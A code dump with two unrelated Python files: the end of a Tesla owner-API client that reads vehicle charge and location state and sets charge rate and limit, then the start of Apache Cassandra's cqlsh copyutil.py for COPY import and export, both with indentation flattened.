logger.error("JSON Decode Error parsing API Token Exchange Response")
pass
params = json.loads(req.text)
# Check for errors
if "error" in params:
return params["error"]
if "access_token" in params:
try:
self.setCarApiBearerToken(params["access_token"])
self.setCarApiRefreshToken(params["refresh_token"])
self.setCarApiTokenExpireTime(time.time() + params["expires_in"])
self.master.queue_background_task({"cmd": "saveSettings"})
return "success"
except KeyError:
logger.log(
logging.INFO2,
"ERROR: Can't access Tesla car via API. Please log in again via web interface.",
)
self.updateCarApiLastErrorTime()
return "response_no_token"
logger.log(logging.INFO2, str(req))
logger.log(logging.INFO2, req.text)
return "unknown"
def setCarApiBearerToken(self, token=None):
if token:
if self.master.tokenSyncEnabled():
# We won't accept tokens if Token Sync is already in place
return False
else:
self.carApiBearerToken = token
return True
else:
return False
def setCarApiRefreshToken(self, token):
self.carApiRefreshToken = token
return True
def setCarApiTokenExpireTime(self, value):
self.carApiTokenExpireTime = value
return True
def setChargeRate(self, charge_rate, vehicle=None):
# As a fallback to allow an initial implementation of the charge rate
# functionality for single-car installs, if no vehicle is specified we
# take the first vehicle returned to us.
if not vehicle:
vehicle = self.getCarApiVehicles()[0]
vehicle.lastAPIAccessTime = time.time()
url = "https://owner-api.teslamotors.com/api/1/vehicles/"
url = url + str(vehicle.ID) + "/command/set_charging_amps"
headers = {
"accept": "application/json",
"Authorization": "Bearer " + self.getCarApiBearerToken(),
}
body = {"charging_amps": charge_rate}
try:
req = requests.post(url, headers=headers, json=body)
logger.log(logging.INFO8, "Car API cmd set_charging_amps" + str(req))
apiResponseDict = json.loads(req.text)
except requests.exceptions.RequestException:
return False
except json.decoder.JSONDecodeError:
return False
return apiResponseDict
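# Illustrative use of the method above (api is assumed to be an instance of
# this class and vehicle a CarApiVehicle):
#   api.setChargeRate(16, vehicle)
# posts the JSON body {"charging_amps": 16} to the vehicle's
# .../command/set_charging_amps endpoint and returns the decoded response
# dict, or False on a request/JSON error.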
def updateCarApiLastErrorTime(self, vehicle=None):
timestamp = time.time()
logger.log(
logging.INFO8,
"updateCarApiLastErrorTime() called due to Tesla API Error. Updating timestamp from "
+ str(self.carApiLastErrorTime)
+ " to "
+ str(timestamp),
)
if vehicle:
vehicle.lastErrorTime = timestamp
vehicle.errorCount += 1
else:
self.carApiLastErrorTime = timestamp
self.errorCount += 1
return True
def updateLastStartOrStopChargeTime(self):
self.carApiLastStartOrStopChargeTime = time.time()
return True
def updateChargeAtHome(self):
for car in self.carApiVehicles:
if car.atHome:
car.update_charge()
self.lastChargeCheck = time.time()
def wakeVehicle(self, vehicle):
apiResponseDict = None
vehicle.lastAPIAccessTime = time.time()
url = "https://owner-api.teslamotors.com/api/1/vehicles/"
url = url + str(vehicle.ID) + "/wake_up"
headers = {
"accept": "application/json",
"Authorization": "Bearer " + self.getCarApiBearerToken(),
}
try:
req = requests.post(url, headers=headers)
logger.log(logging.INFO8, "Car API cmd wake_up" + str(req))
apiResponseDict = json.loads(req.text)
except requests.exceptions.RequestException:
return False
except json.decoder.JSONDecodeError:
return False
return apiResponseDict
@property
def numCarsAtHome(self):
return len([car for car in self.carApiVehicles if car.atHome])
@property
def minBatteryLevelAtHome(self):
if time.time() - self.lastChargeCheck > self.chargeUpdateInterval:
self.master.queue_background_task({"cmd": "checkCharge"})
return min(
[car.batteryLevel for car in self.carApiVehicles if car.atHome],
default=10000,
)
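# Note on the 10000 values used above and below: batteryLevel, lat and lon
# default to 10000 as 'unknown' sentinels (real values are far smaller), so
# minBatteryLevelAtHome returns 10000 when no tracked car is currently at
# home, and is_location_home() treats a home latitude of 10000 as
# 'home never set'.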
class CarApiVehicle:
carapi = None
__config = None
debuglevel = 0
ID = None
name = ""
syncSource = "TeslaAPI"
VIN = ""
firstWakeAttemptTime = 0
lastAPIAccessTime = 0
delayNextWakeAttempt = 0
lastLimitAttemptTime = 0
errorCount = 0
lastErrorTime = 0
lastDriveStatusTime = 0
lastChargeStatusTime = 0
stopAskingToStartCharging = False
stopTryingToApplyLimit = False
batteryLevel = 10000
chargeLimit = -1
lat = 10000
lon = 10000
atHome = False
timeToFullCharge = 0.0
# Sync values are updated by an external module such as TeslaMate
syncTimestamp = 0
syncTimeout = 60 * 60
syncLat = 10000
syncLon = 10000
syncState = "asleep"
def __init__(self, json, carapi, config):
self.carapi = carapi
self.__config = config
self.ID = json["id"]
self.VIN = json["vin"]
self.name = json["display_name"]
# Launch sync monitoring thread
Thread(target=self.checkSyncNotStale).start()
def checkSyncNotStale(self):
# Once an external system begins providing sync functionality to defer
# Tesla API queries and provide already fetched information, there is a
# potential condition which may occur in which the external system goes
# away and leaves us with stale data.
# To guard against this, this threaded function will loop every x minutes
# and check the last sync timestamp. If it has not updated in that interval,
# we switch back to using the API
while True:
if (
self.syncSource != "TeslaAPI"
and self.is_awake()
and (self.syncTimestamp < (time.time() - self.syncTimeout))
):
logger.error(
"Data from "
+ self.syncSource
+ " for "
+ self.name
+ " is stale. Switching back to TeslaAPI"
)
self.syncSource = "TeslaAPI"
time.sleep(self.syncTimeout)
def ready(self):
if self.carapi.getCarApiRetryRemaining(self):
# It's been under carApiErrorRetryMins minutes since the car API
# generated an error on this vehicle. Return that car is not ready.
logger.log(
logging.INFO8,
self.name
+ " not ready because of recent lastErrorTime "
+ str(self.lastErrorTime),
)
return False
if (
self.firstWakeAttemptTime == 0
and time.time() - self.lastAPIAccessTime < 2 * 60
):
# If it's been less than 2 minutes since we successfully woke this car, it
# should still be awake. No need to check. It returns to sleep state about
# two minutes after the last command was issued.
return True
# This can check whether the car is online; if so, it will likely stay online for
# two minutes.
if self.is_awake():
self.firstWakeAttemptTime = 0
return True
logger.log(
logging.INFO8,
self.name + " not ready because it wasn't woken in the last 2 minutes.",
)
return False
# Permits opportunistic API requests
def is_awake(self):
if self.syncSource == "TeslaAPI":
url = "https://owner-api.teslamotors.com/api/1/vehicles/" + str(self.ID)
(result, response) = self.get_car_api(
url, checkReady=False, provesOnline=False
)
return result and response.get("state", "") == "online"
else:
return (
self.syncState == "online"
or self.syncState == "charging"
or self.syncState == "updating"
or self.syncState == "driving"
)
def get_car_api(self, url, checkReady=True, provesOnline=True):
if checkReady and not self.ready():
return False, None
apiResponseDict = {}
headers = {
"accept": "application/json",
"Authorization": "Bearer " + self.carapi.getCarApiBearerToken(),
}
# Retry up to 3 times on certain errors.
for _ in range(0, 3):
try:
req = requests.get(url, headers=headers)
logger.log(logging.INFO8, "Car API cmd " + url + " " + str(req))
apiResponseDict = json.loads(req.text)
# This error can happen here as well:
# {'response': {'reason': 'could_not_wake_buses', 'result': False}}
# This one is somewhat common:
# {'response': None, 'error': 'vehicle unavailable: {:error=>"vehicle unavailable:"}', 'error_description': ''}
except requests.exceptions.RequestException:
pass
except json.decoder.JSONDecodeError:
pass
try:
logger.debug("Car API vehicle status" + str(apiResponseDict))
response = apiResponseDict["response"]
# A successful call to drive_state will not contain a
# response['reason'], so we check if the 'reason' key exists.
if (
"reason" in response
and response["reason"] == "could_not_wake_buses"
):
# Retry after 5 seconds. See notes in car_api_charge where
# 'could_not_wake_buses' is handled.
time.sleep(5)
continue
except (KeyError, TypeError):
# This catches cases like trying to access
# apiResponseDict['response'] when 'response' doesn't exist in
# apiResponseDict.
logger.info(
"ERROR: Can't access vehicle status for "
+ self.name
+ ". Will try again later."
)
self.carapi.updateCarApiLastErrorTime(self)
return False, None
if provesOnline:
self.lastAPIAccessTime = time.time()
return (True, response)
else:
self.carapi.updateCarApiLastErrorTime(self)
return (False, None)
def update_location(self, cacheTime=60):
if self.syncSource == "TeslaAPI":
url = "https://owner-api.teslamotors.com/api/1/vehicles/"
url = url + str(self.ID) + "/data_request/drive_state"
now = time.time()
if now - self.lastDriveStatusTime < cacheTime:
return True
try:
(result, response) = self.get_car_api(url)
except TypeError:
logger.log(logging.ERROR, "Got None response from get_car_api()")
return False
if result:
self.lastDriveStatusTime = now
self.lat = response["latitude"]
self.lon = response["longitude"]
self.atHome = self.carapi.is_location_home(self.lat, self.lon)
return result
else:
self.lat = self.syncLat
self.lon = self.syncLon
self.atHome = self.carapi.is_location_home(self.lat, self.lon)
return True
def update_charge(self):
if self.syncSource == "TeslaAPI":
url = "https://owner-api.teslamotors.com/api/1/vehicles/"
url = url + str(self.ID) + "/data_request/charge_state"
now = time.time()
if now - self.lastChargeStatusTime < 60:
return True
try:
(result, response) = self.get_car_api(url)
except TypeError:
logger.log(logging.ERROR, "Got None response from get_car_api()")
return False
if result:
self.lastChargeStatusTime = time.time()
self.chargeLimit = response["charge_limit_soc"]
self.batteryLevel = response["battery_level"]
self.timeToFullCharge = response["time_to_full_charge"]
return result
else:
return True
def apply_charge_limit(self, limit):
if self.stopTryingToApplyLimit:
return True
now = time.time()
if (
now - self.lastLimitAttemptTime <= 300
or self.carapi.getCarApiRetryRemaining(self)
):
return False
if self.ready() is False:
return False
self.lastLimitAttemptTime = now
url = "https://owner-api.teslamotors.com/api/1/vehicles/"
url = url + str(self.ID) + "/command/set_charge_limit"
headers = {
"accept": "application/json",
"Authorization": "Bearer " + self.carapi.getCarApiBearerToken(),
}
body = {"percent": limit}
for _ in range(0, 3):
try:
req = requests.post(url, headers=headers, json=body)
logger.log(logging.INFO8, "Car API cmd set_charge_limit " + str(req))
apiResponseDict = json.loads(req.text)
except requests.exceptions.RequestException:
pass
except json.decoder.JSONDecodeError:
pass
result = False
reason = ""
try:
result = apiResponseDict["response"]["result"]
reason = apiResponseDict["response"]["reason"]
except (KeyError, TypeError):
# This catches unexpected cases like trying to access
# apiResponseDict['response'] when 'response' doesn't exist
# in apiResponseDict.
result = False
if result is True or reason == "already_set":
self.stopTryingToApplyLimit = True
self.lastAPIAccessTime = now
self.carapi.resetCarApiLastErrorTime(self)
return True
elif reason == "could_not_wake_buses":
time.sleep(5)
continue
else:
self.carapi.updateCarApiLastErrorTime(self)
return False
|
copyutil.py
|
# cython: profile=True
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import ConfigParser
import csv
import datetime
import json
import glob
import multiprocessing as mp
import os
import platform
import random
import re
import struct
import sys
import threading
import time
import traceback
from bisect import bisect_right
from calendar import timegm
from collections import defaultdict, namedtuple
from decimal import Decimal
from Queue import Queue
from random import randrange
from StringIO import StringIO
from select import select
from uuid import UUID
from util import profile_on, profile_off
from cassandra.cluster import Cluster
from cassandra.cqltypes import ReversedType, UserType
from cassandra.metadata import protect_name, protect_names, protect_value
from cassandra.policies import RetryPolicy, WhiteListRoundRobinPolicy, DCAwareRoundRobinPolicy
from cassandra.query import BatchStatement, BatchType, SimpleStatement, tuple_factory
from cassandra.util import Date, Time
from cql3handling import CqlRuleSet
from displaying import NO_COLOR_MAP
from formatting import format_value_default, DateTimeFormat, EMPTY, get_formatter
from sslhandling import ssl_settings
PROFILE_ON = False
STRACE_ON = False
DEBUG = False # This may be set to True when initializing the task
IS_LINUX = platform.system() == 'Linux'
IS_WINDOWS = platform.system() == 'Windows'
CopyOptions = namedtuple('CopyOptions', 'copy dialect unrecognized')
def safe_normpath(fname):
"""
:return: the normalized path, but only if there is a filename; we don't want to convert
an empty string (which means no file name) into a dot. Also expand any user variables such as ~ to the full path.
"""
return os.path.normpath(os.path.expanduser(fname)) if fname else fname
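# Illustrative behaviour of safe_normpath (assuming a Unix home directory of
# /home/user):
#   safe_normpath('~/data//rows.csv')  ->  '/home/user/data/rows.csv'
#   safe_normpath('')                  ->  ''   (left untouched, not '.')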
def printdebugmsg(msg):
if DEBUG:
printmsg(msg)
def printmsg(msg, eol='\n', encoding='utf8'):
sys.stdout.write(msg.encode(encoding))
sys.stdout.write(eol)
sys.stdout.flush()
# Keep arguments in sync with printmsg
def swallowmsg(msg, eol='', encoding=''):
pass
class OneWayPipe(object):
"""
A one way pipe protected by two process level locks, one for reading and one for writing.
"""
def __init__(self):
self.reader, self.writer = mp.Pipe(duplex=False)
self.rlock = mp.Lock()
self.wlock = mp.Lock()
def send(self, obj):
with self.wlock:
self.writer.send(obj)
def recv(self):
with self.rlock:
return self.reader.recv()
def close(self):
self.reader.close()
self.writer.close()
class ReceivingChannel(object):
"""
A one way channel that wraps a pipe to receive messages.
"""
def __init__(self, pipe):
self.pipe = pipe
def recv(self):
return self.pipe.recv()
def close(self):
self.pipe.close()
class SendingChannel(object):
"""
A one way channel that wraps a pipe and provides a feeding thread to send messages asynchronously.
"""
def __init__(self, pipe):
self.pipe = pipe
self.pending_messages = Queue()
def feed():
while True:
try:
msg = self.pending_messages.get()
self.pipe.send(msg)
except Exception, e:
printmsg('%s: %s' % (e.__class__.__name__, e.message))
feeding_thread = threading.Thread(target=feed)
feeding_thread.setDaemon(True)
feeding_thread.start()
def send(self, obj):
self.pending_messages.put(obj)
def num_pending(self):
return self.pending_messages.qsize() if self.pending_messages else 0
def close(self):
self.pipe.close()
class SendingChannels(object):
"""
A group of one way channels for sending messages.
"""
def __init__(self, num_channels):
self.pipes = [OneWayPipe() for _ in xrange(num_channels)]
self.channels = [SendingChannel(p) for p in self.pipes]
self.num_channels = num_channels
def close(self):
for ch in self.channels:
try:
ch.close()
except Exception:
pass
class ReceivingChannels(object):
"""
A group of one way channels for receiving messages.
"""
def __init__(self, num_channels):
self.pipes = [OneWayPipe() for _ in xrange(num_channels)]
self.channels = [ReceivingChannel(p) for p in self.pipes]
self._readers = [p.reader for p in self.pipes]
self._rlocks = [p.rlock for p in self.pipes]
self._rlocks_by_readers = dict([(p.reader, p.rlock) for p in self.pipes])
self.num_channels = num_channels
self.recv = self.recv_select if IS_LINUX else self.recv_polling
def recv_select(self, timeout):
"""
Implementation of the recv method for Linux, where select is available. Receive an object from
all pipes that are ready for reading without blocking.
"""
readable, _, _ = select(self._readers, [], [], timeout)
for r in readable:
with self._rlocks_by_readers[r]:
try:
yield r.recv()
except EOFError:
continue
def recv_polling(self, timeout):
"""
Implementation of the recv method for platforms where select() is not available for pipes.
We poll all of the readers with a very small timeout. We stop once the specified timeout
has elapsed, but we may exceed it slightly since we check all processes during each sweep.
"""
start = time.time()
while True:
for i, r in enumerate(self._readers):
with self._rlocks[i]:
if r.poll(0.000000001):
try:
yield r.recv()
except EOFError:
continue
if time.time() - start > timeout:
break
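# Note on the polling fallback above: on Windows, select() only works on
# sockets, not on pipes, which is why ReceivingChannels.__init__ switches to
# recv_polling on non-Linux platforms instead of recv_select.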
def close(self):
for ch in self.channels:
try:
ch.close()
except Exception:
pass
class CopyTask(object):
"""
A base class for ImportTask and ExportTask
"""
def __init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file, direction):
self.shell = shell
self.ks = ks
self.table = table
self.table_meta = self.shell.get_table_meta(self.ks, self.table)
self.host = shell.conn.get_control_connection_host()
self.fname = safe_normpath(fname)
self.protocol_version = protocol_version
self.config_file = config_file
# if cqlsh is invoked with --debug then set the global debug flag to True
if shell.debug:
global DEBUG
DEBUG = True
# do not display messages when exporting to STDOUT unless --debug is set
self.printmsg = printmsg if self.fname is not None or direction == 'from' or DEBUG \
else swallowmsg
self.options = self.parse_options(opts, direction)
self.num_processes = self.options.copy['numprocesses']
self.encoding = self.options.copy['encoding']
self.printmsg('Using %d child processes' % (self.num_processes,))
if direction == 'from':
self.num_processes += 1 # add the feeder process
self.processes = []
self.inmsg = ReceivingChannels(self.num_processes)
self.outmsg = SendingChannels(self.num_processes)
self.columns = CopyTask.get_columns(shell, ks, table, columns)
self.time_start = time.time()
def maybe_read_config_file(self, opts, direction):
"""
Read optional sections from a configuration file that was specified in the command options or from the default
cqlshrc configuration file if none was specified.
"""
config_file = opts.pop('configfile', '')
if not config_file:
config_file = self.config_file
if not os.path.isfile(config_file):
return opts
configs = ConfigParser.RawConfigParser()
configs.readfp(open(config_file))
ret = dict()
config_sections = list(['copy', 'copy-%s' % (direction,),
'copy:%s.%s' % (self.ks, self.table),
'copy-%s:%s.%s' % (direction, self.ks, self.table)])
for section in config_sections:
if configs.has_section(section):
options = dict(configs.items(section))
self.printmsg("Reading options from %s:[%s]: %s" % (config_file, section, options))
ret.update(options)
# Update this last so the command line options take precedence over the configuration file options
if opts:
self.printmsg("Reading options from the command line: %s" % (opts,))
ret.update(opts)
if self.shell.debug: # this is important for testing, do not remove
self.printmsg("Using options: '%s'" % (ret,))
return ret
@staticmethod
def clean_options(opts):
"""
Convert all option values to valid string literals unless they are path names
"""
return dict([(k, v.decode('string_escape') if k not in ['errfile', 'ratefile'] else v)
for k, v, in opts.iteritems()])
def parse_options(self, opts, direction):
"""
Parse options for import (COPY FROM) and export (COPY TO) operations.
Extract the csv and dialect options from opts.
:return: a CopyOptions namedtuple wrapping 3 dictionaries: the copy options, the dialect options and any unrecognized options.
"""
shell = self.shell
opts = self.clean_options(self.maybe_read_config_file(opts, direction))
dialect_options = dict()
dialect_options['quotechar'] = opts.pop('quote', '"')
dialect_options['escapechar'] = opts.pop('escape', '\\')
dialect_options['delimiter'] = opts.pop('delimiter', ',')
if dialect_options['quotechar'] == dialect_options['escapechar']:
dialect_options['doublequote'] = True
del dialect_options['escapechar']
else:
dialect_options['doublequote'] = False
copy_options = dict()
copy_options['nullval'] = opts.pop('null', '')
copy_options['header'] = bool(opts.pop('header', '').lower() == 'true')
copy_options['encoding'] = opts.pop('encoding', 'utf8')
copy_options['maxrequests'] = int(opts.pop('maxrequests', 6))
copy_options['pagesize'] = int(opts.pop('pagesize', 1000))
# by default the page timeout is 10 seconds per 1000 entries
# in the page size or 10 seconds if pagesize is smaller
copy_options['pagetimeout'] = int(opts.pop('pagetimeout', max(10, 10 * (copy_options['pagesize'] / 1000))))
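# For example, with the default pagesize of 1000 the formula above gives
# max(10, 10 * (1000 / 1000)) = 10 seconds, while a pagesize of 5000 gives
# max(10, 10 * 5) = 50 seconds.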
copy_options['maxattempts'] = int(opts.pop('maxattempts', 5))
copy_options['dtformats'] = DateTimeFormat(opts.pop('datetimeformat', shell.display_timestamp_format),
shell.display_date_format, shell.display_nanotime_format)
copy_options['float_precision'] = shell.display_float_precision
copy_options['chunksize'] = int(opts.pop('chunksize', 5000))
copy_options['ingestrate'] = int(opts.pop('ingestrate', 100000))
copy_options['maxbatchsize'] = int(opts.pop('maxbatchsize', 20))
copy_options['minbatchsize'] = int(opts.pop('minbatchsize', 10))
copy_options['reportfrequency'] = float(opts.pop('reportfrequency', 0.25))
copy_options['consistencylevel'] = shell.consistency_level
copy_options['decimalsep'] = opts.pop('decimalsep', '.')
copy_options['thousandssep'] = opts.pop('thousandssep', '')
copy_options['boolstyle'] = [s.strip() for s in opts.pop('boolstyle', 'True, False').split(',')]
copy_options['numprocesses'] = int(opts.pop('numprocesses', self.get_num_processes(16)))
copy_options['begintoken'] = opts.pop('begintoken', '')
copy_options['endtoken'] = opts.pop('endtoken', '')
copy_options['maxrows'] = int(opts.pop('maxrows', '-1'))
copy_options['skiprows'] = int(opts.pop('skiprows', '0'))
copy_options['skipcols'] = opts.pop('skipcols', '')
copy_options['maxparseerrors'] = int(opts.pop('maxparseerrors', '-1'))
copy_options['maxinserterrors'] = int(opts.pop('maxinserterrors', '-1'))
copy_options['errfile'] = safe_normpath(opts.pop('errfile', 'import_%s_%s.err' % (self.ks, self.table,)))
copy_options['ratefile'] = safe_normpath(opts.pop('ratefile', ''))
copy_options['maxoutputsize'] = int(opts.pop('maxoutputsize', '-1'))
copy_options['preparedstatements'] = bool(opts.pop('preparedstatements', 'true').lower() == 'true')
self.check_options(copy_options)
return CopyOptions(copy=copy_options, dialect=dialect_options, unrecognized=opts)
@staticmethod
def check_options(copy_options):
"""
Check any options that require a sanity check beyond a simple type conversion and if required
raise a value error:
- boolean styles must be exactly 2, they must be different and they cannot be empty
"""
bool_styles = copy_options['boolstyle']
if len(bool_styles) != 2 or bool_styles[0] == bool_styles[1] or not bool_styles[0] or not bool_styles[1]:
raise ValueError("Invalid boolean styles %s" % copy_options['boolstyle'])
@staticmethod
def get_num_processes(cap):
"""
Pick a reasonable number of child processes. We need to leave at
least one core for the parent or feeder process.
"""
return max(1, min(cap, CopyTask.get_num_cores() - 1))
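# For example, with the default cap of 16 on an 8-core machine this yields
# min(16, 8 - 1) = 7 worker processes; on a single-core machine the
# max(1, ...) guard still provides one worker.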
@staticmethod
def get_num_cores():
"""
Return the number of cores if available. If the test environment variable
is set, then return the number carried by this variable. This makes it easier
to simulate a single-core machine in tests.
"""
try:
num_cores_for_testing = os.environ.get('CQLSH_COPY_TEST_NUM_CORES', '')
return int(num_cores_for_testing) if num_cores_for_testing else mp.cpu_count()
except NotImplementedError:
return 1
@staticmethod
def describe_interval(seconds):
desc = []
for length, unit in ((86400, 'day'), (3600, 'hour'), (60, 'minute')):
num = int(seconds) / length
if num > 0:
desc.append('%d %s' % (num, unit))
if num > 1:
desc[-1] += 's'
seconds %= length
words = '%.03f seconds' % seconds
if len(desc) > 1:
words = ', '.join(desc) + ', and ' + words
elif len(desc) == 1:
words = desc[0] + ' and ' + words
return words
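# Illustrative output of describe_interval:
#   describe_interval(3725.5)  ->  '1 hour, 2 minutes, and 5.500 seconds'
#   describe_interval(42)      ->  '42.000 seconds'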
@staticmethod
def get_columns(shell, ks, table, columns):
"""
Return all columns if none were specified or only the columns specified.
Possible enhancement: introduce a regex like syntax (^) to allow users
to specify all columns except a few.
"""
return shell.get_column_names(ks, table) if not columns else columns
def close(self):
self.stop_processes()
self.inmsg.close()
self.outmsg.close()
def num_live_processes(self):
return sum(1 for p in self.processes if p.is_alive())
@staticmethod
def get_pid():
return os.getpid() if hasattr(os, 'getpid') else None
@staticmethod
def trace_process(pid):
if pid and STRACE_ON:
os.system("strace -vvvv -c -o strace.{pid}.out -e trace=all -p {pid}&".format(pid=pid))
def start_processes(self):
for i, process in enumerate(self.processes):
process.start()
self.trace_process(process.pid)
self.trace_process(self.get_pid())
def stop_processes(self):
for process in self.processes:
process.terminate()
def make_params(self):
"""
Return a dictionary of parameters to be used by the worker processes.
On Windows this dictionary must be pickle-able, therefore we do not pass the
parent connection since it may not be pickle-able. Also, on Windows child
processes are spawned and not forked, and therefore we don't need to shutdown
the parent connection anyway, see CASSANDRA-11749 for more details.
"""
shell = self.shell
return dict(ks=self.ks,
table=self.table,
local_dc=self.host.datacenter,
columns=self.columns,
options=self.options,
connect_timeout=shell.conn.connect_timeout,
hostname=self.host.address,
port=shell.port,
ssl=shell.ssl,
auth_provider=shell.auth_provider,
parent_cluster=shell.conn if not IS_WINDOWS else None,
cql_version=shell.conn.cql_version,
config_file=self.config_file,
protocol_version=self.protocol_version,
debug=shell.debug
)
def validate_columns(self):
shell = self.shell
if not self.columns:
shell.printerr("No column specified")
return False
for c in self.columns:
if c not in self.table_meta.columns:
shell.printerr('Invalid column name %s' % (c,))
return False
return True
def update_params(self, params, i):
"""
Add the communication pipes to the parameters to be passed to the worker process:
inpipe is the message pipe flowing from parent to child process, so outpipe from the parent point
of view and, vice-versa, outpipe is the message pipe flowing from child to parent, so inpipe
from the parent point of view, hence the two are swapped below.
"""
params['inpipe'] = self.outmsg.pipes[i]
params['outpipe'] = self.inmsg.pipes[i]
return params
class ExportWriter(object):
"""
A class that writes to one or more csv files, or STDOUT
"""
def __init__(self, fname, shell, columns, options):
self.fname = fname
self.shell = shell
self.columns = columns
self.options = options
self.header = options.copy['header']
self.max_output_size = long(options.copy['maxoutputsize'])
self.current_dest = None
self.num_files = 0
if self.max_output_size > 0:
if fname is not None:
self.write = self._write_with_split
self.num_written = 0
else:
shell.printerr("WARNING: maxoutputsize {} ignored when writing to STDOUT".format(self.max_output_size))
self.write = self._write_without_split
else:
self.write = self._write_without_split
def open(self):
self.current_dest = self._get_dest(self.fname)
if self.current_dest is None:
return False
if self.header:
writer = csv.writer(self.current_dest.output, **self.options.dialect)
writer.writerow(self.columns)
return True
def close(self):
self._close_current_dest()
def _next_dest(self):
self._close_current_dest()
self.current_dest = self._get_dest(self.fname + '.%d' % (self.num_files,))
def _get_dest(self, source_name):
"""
Open the output file, if any, or else use stdout. Return a namedtuple
containing the output and a boolean indicating whether the output should be closed.
"""
CsvDest = namedtuple('CsvDest', 'output close')
if self.fname is None:
return CsvDest(output=sys.stdout, close=False)
else:
try:
ret = CsvDest(output=open(source_name, 'wb'), close=True)
self.num_files += 1
return ret
except IOError, e:
self.shell.printerr("Can't open %r for writing: %s" % (source_name, e))
return None
def _close_current_dest(self):
if self.current_dest and self.current_dest.close:
self.current_dest.output.close()
self.current_dest = None
def _write_without_split(self, data, _):
"""
Write the data to the current destination output.
"""
self.current_dest.output.write(data)
def _write_with_split(self, data, num):
"""
Write the data to the current destination output if we still
haven't reached the maximum number of rows. Otherwise split
the rows between the current destination and the next.
"""
if (self.num_written + num) > self.max_output_size:
num_remaining = self.max_output_size - self.num_written
last_switch = 0
for i, row in enumerate(filter(None, data.split(os.linesep))):
if i == num_remaining:
self._next_dest()
last_switch = i
num_remaining += self.max_output_size
self.current_dest.output.write(row + '\n')
self.num_written = num - last_switch
else:
self.num_written += num
self.current_dest.output.write(data)
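# Worked example for _write_with_split (numbers assumed): with
# max_output_size=10 and num_written=8, writing a chunk of num=5 rows sends
# the first 2 rows to the current file, switches to the next file at i == 2,
# writes the remaining 3 rows there, and leaves num_written == 5 - 2 == 3.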
class ExportTask(CopyTask):
"""
A class that exports data to .csv by instantiating one or more processes that work in parallel (ExportProcess).
"""
def __init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file):
CopyTask.__init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file, 'to')
options = self.options
self.begin_token = long(options.copy['begintoken']) if options.copy['begintoken'] else None
self.end_token = long(options.copy['endtoken']) if options.copy['endtoken'] else None
self.writer = ExportWriter(fname, shell, columns, options)
def run(self):
"""
Initiates the export by starting the worker processes.
Then hand over control to export_records.
"""
shell = self.shell
if self.options.unrecognized:
shell.printerr('Unrecognized COPY TO options: %s' % ', '.join(self.options.unrecognized.keys()))
return
if not self.validate_columns():
return 0
ranges = self.get_ranges()
if not ranges:
return 0
if not self.writer.open():
return 0
columns = u"[" + u", ".join(self.columns) + u"]"
self.printmsg(u"\nStarting copy of %s.%s with columns %s." % (self.ks, self.table, columns), encoding=self.encoding)
params = self.make_params()
for i in xrange(self.num_processes):
self.processes.append(ExportProcess(self.update_params(params, i)))
self.start_processes()
try:
self.export_records(ranges)
finally:
self.close()
def close(self):
CopyTask.close(self)
self.writer.close()
def get_ranges(self):
"""
return a queue of tuples, where the first tuple entry is a token range (from, to]
and the second entry is a list of hosts that own that range. Each host is responsible
for all the tokens in the range (from, to].
The ring information comes from the driver metadata token map, which is built by
querying System.PEERS.
We only consider replicas that are in the local datacenter. If there are no local replicas
we use the cqlsh session host.
"""
shell = self.shell
hostname = self.host.address
local_dc = self.host.datacenter
ranges = dict()
min_token = self.get_min_token()
begin_token = self.begin_token
end_token = self.end_token
def make_range(prev, curr):
"""
Return the intersection of (prev, curr) and (begin_token, end_token),
return None if the intersection is empty
"""
ret = (prev, curr)
if begin_token:
if ret[1] < begin_token:
return None
elif ret[0] < begin_token:
ret = (begin_token, ret[1])
if end_token:
if ret[0] > end_token:
return None
elif ret[1] > end_token:
ret = (ret[0], end_token)
return ret
def make_range_data(replicas=None):
hosts = []
if replicas:
for r in replicas:
if r.is_up is not False and r.datacenter == local_dc:
hosts.append(r.address)
if not hosts:
hosts.append(hostname) # fallback to default host if no replicas in current dc
return {'hosts': tuple(hosts), 'attempts': 0, 'rows': 0, 'workerno': -1}
if begin_token and begin_token < min_token:
shell.printerr('Begin token %d must be bigger or equal to min token %d' % (begin_token, min_token))
return ranges
if begin_token and end_token and begin_token > end_token:
shell.printerr('Begin token %d must be smaller than end token %d' % (begin_token, end_token))
return ranges
if shell.conn.metadata.token_map is None or min_token is None:
ranges[(begin_token, end_token)] = make_range_data()
return ranges
ring = shell.get_ring(self.ks).items()
ring.sort()
if not ring:
# If the ring is empty we get the entire ring from the host we are currently connected to
ranges[(begin_token, end_token)] = make_range_data()
elif len(ring) == 1:
# If there is only one token we get the entire ring from the replicas for that token
ranges[(begin_token, end_token)] = make_range_data(ring[0][1])
else:
# else we loop on the ring
first_range_data = None
previous = None
for token, replicas in ring:
if not first_range_data:
first_range_data = make_range_data(replicas) # we use it at the end when wrapping around
if token.value == min_token:
continue # avoids looping entire ring
current_range = make_range(previous, token.value)
if not current_range:
continue
ranges[current_range] = make_range_data(replicas)
previous = token.value
# For the last ring interval we query the same replicas that hold the first token in the ring
if previous is not None and (not end_token or previous < end_token):
ranges[(previous, end_token)] = first_range_data
if not ranges:
shell.printerr('Found no ranges to query, check begin and end tokens: %s - %s' % (begin_token, end_token))
return ranges
def get_min_token(self):
"""
:return: the minimum token, which depends on the partitioner.
For partitioners that do not support tokens we return None; in
that case we will not work in parallel, we'll just send all requests
to the cqlsh session host.
"""
partitioner = self.shell.conn.metadata.partitioner
if partitioner.endswith('RandomPartitioner'):
return -1
elif partitioner.endswith('Murmur3Partitioner'):
return -(2 ** 63) # Long.MIN_VALUE in Java
else:
return None
def send_work(self, ranges, tokens_to_send):
prev_worker_no = ranges[tokens_to_send[0]]['workerno']
i = prev_worker_no + 1 if -1 <= prev_worker_no < (self.num_processes - 1) else 0
for token_range in tokens_to_send:
ranges[token_range]['workerno'] = i
self.outmsg.channels[i].send((token_range, ranges[token_range]))
ranges[token_range]['attempts'] += 1
i = i + 1 if i < self.num_processes - 1 else 0
